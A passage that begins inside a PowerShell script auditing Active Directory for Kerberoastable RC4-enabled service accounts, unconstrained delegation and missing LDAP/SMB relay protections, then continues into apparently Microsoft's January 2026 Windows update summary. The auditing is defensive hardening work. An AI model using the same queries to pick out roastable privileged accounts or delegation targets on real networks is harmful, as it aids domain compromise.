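        -Properties servicePrincipalName, msDS-SupportedEncryptionTypes, PasswordLastSet, adminCount |
      ForEach-Object {
        $etypes = $_.'msDS-SupportedEncryptionTypes'
        $legacy = $RC4 -bor $DES_CRC -bor $DES_MD5
        [pscustomobject]@{
            Account         = $_.SamAccountName
            Privileged      = [bool]$_.adminCount
            PasswordLastSet = $_.PasswordLastSet
            AllowsRC4       = ($null -eq $etypes) -or (($etypes -band $RC4) -ne 0)
            AESOnly         = ($null -ne $etypes) -and (($etypes -band ($AES128 -bor $AES256)) -ne 0) -and (($etypes -band $legacy) -eq 0)
            SPNs            = ($_.servicePrincipalName -join ';')
        }
      }
}

function Get-UnconstrainedDelegation {
    # A principal with TRUSTED_FOR_DELEGATION caches forwardable TGTs of every user that
    # authenticates to it. Domain controllers (primary group 516/521) legitimately have it;
    # anything else is a candidate for constrained or resource-based delegation instead.
    Get-ADObject -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_FOR_DELEGATION)" `
        -Properties sAMAccountName, objectClass, primaryGroupID |
      Select-Object @{ n = 'Account'; e = { $_.sAMAccountName } },
                    objectClass,
                    @{ n = 'IsDomainController'; e = { $_.primaryGroupID -in 516, 521 } }
}

function Get-RelayMitigationStatus {
    # Authentication relay against LDAP/SMB is stopped by signing and channel binding.
    # These are per-machine settings, so run this on each DC (for example via Invoke-Command).
    $ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
    $integrity = (Get-ItemProperty -Path $ntds -Name LDAPServerIntegrity     -ErrorAction SilentlyContinue).LDAPServerIntegrity
    $binding   = (Get-ItemProperty -Path $ntds -Name LdapEnforceChannelBinding -ErrorAction SilentlyContinue).LdapEnforceChannelBinding
    [pscustomobject]@{
        LdapSigningRequired        = ($integrity -eq 2)   # 2 = require signing
        LdapChannelBindingEnforced = ($binding   -eq 2)   # 2 = always
        SmbSigningRequired         = (Get-SmbServerConfiguration).RequireSecuritySigning
    }
}

# Start with the accounts that matter most: privileged SPN holders that still accept RC4.
Get-KerberoastCandidate | Where-Object { $_.AllowsRC4 } |
    Sort-Object Privileged -Descending | Format-Table Account, Privileged, PasswordLastSet, AESOnly -AutoSize
Get-UnconstrainedDelegation | Where-Object { -not $_.IsDomainController } | Format-Table -AutoSize
Get-RelayMitigationStatus
```

Every row reported as AllowsRC4 = True is an account whose service tickets can still be issued with RC4 regardless of what the domain controller supports, which is why the Kerberos phase-one guidance pairs auditing with per-account encryption-type changes rather than a single domain-wide switch.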
[REMINDER] – Starting with the January 2026 security update, Windows Server 2025 updates and release notes have their own KB identifiers and build numbers. These identifiers are separate from those for Windows 11, versions 24H2 and 25H2. This change improves clarity for administrators. Installation and management processes remain the same.
Out-of-band updates
Two out-of-band updates were released in January:
January 17, 2026 – Out-of-band update to address sign-in failures during Remote Desktop connections
January 24, 2026 – Out-of-band update to address cloud‑backed storage application issues
Looking for the latest news and previews for Windows, Copilot, Copilot+ PCs, the Windows and Windows Server Insider Programs, and more? Check out these resources:
Windows Roadmap for new Copilot+ PCs and Windows features – filter by platform, version, status, and channel or search by feature name
If you are an IT admin with questions about managing and updating Windows, add our monthly Windows Office Hours to your calendar. We assemble a crew of Windows, Windows 365, security, and Intune experts to help answer your questions and provide tips on tools, best practices, and troubleshooting.
Finally, we are always looking to improve this monthly summary. Drop us a note in the Comments and let us know what we can do to make this more useful for you!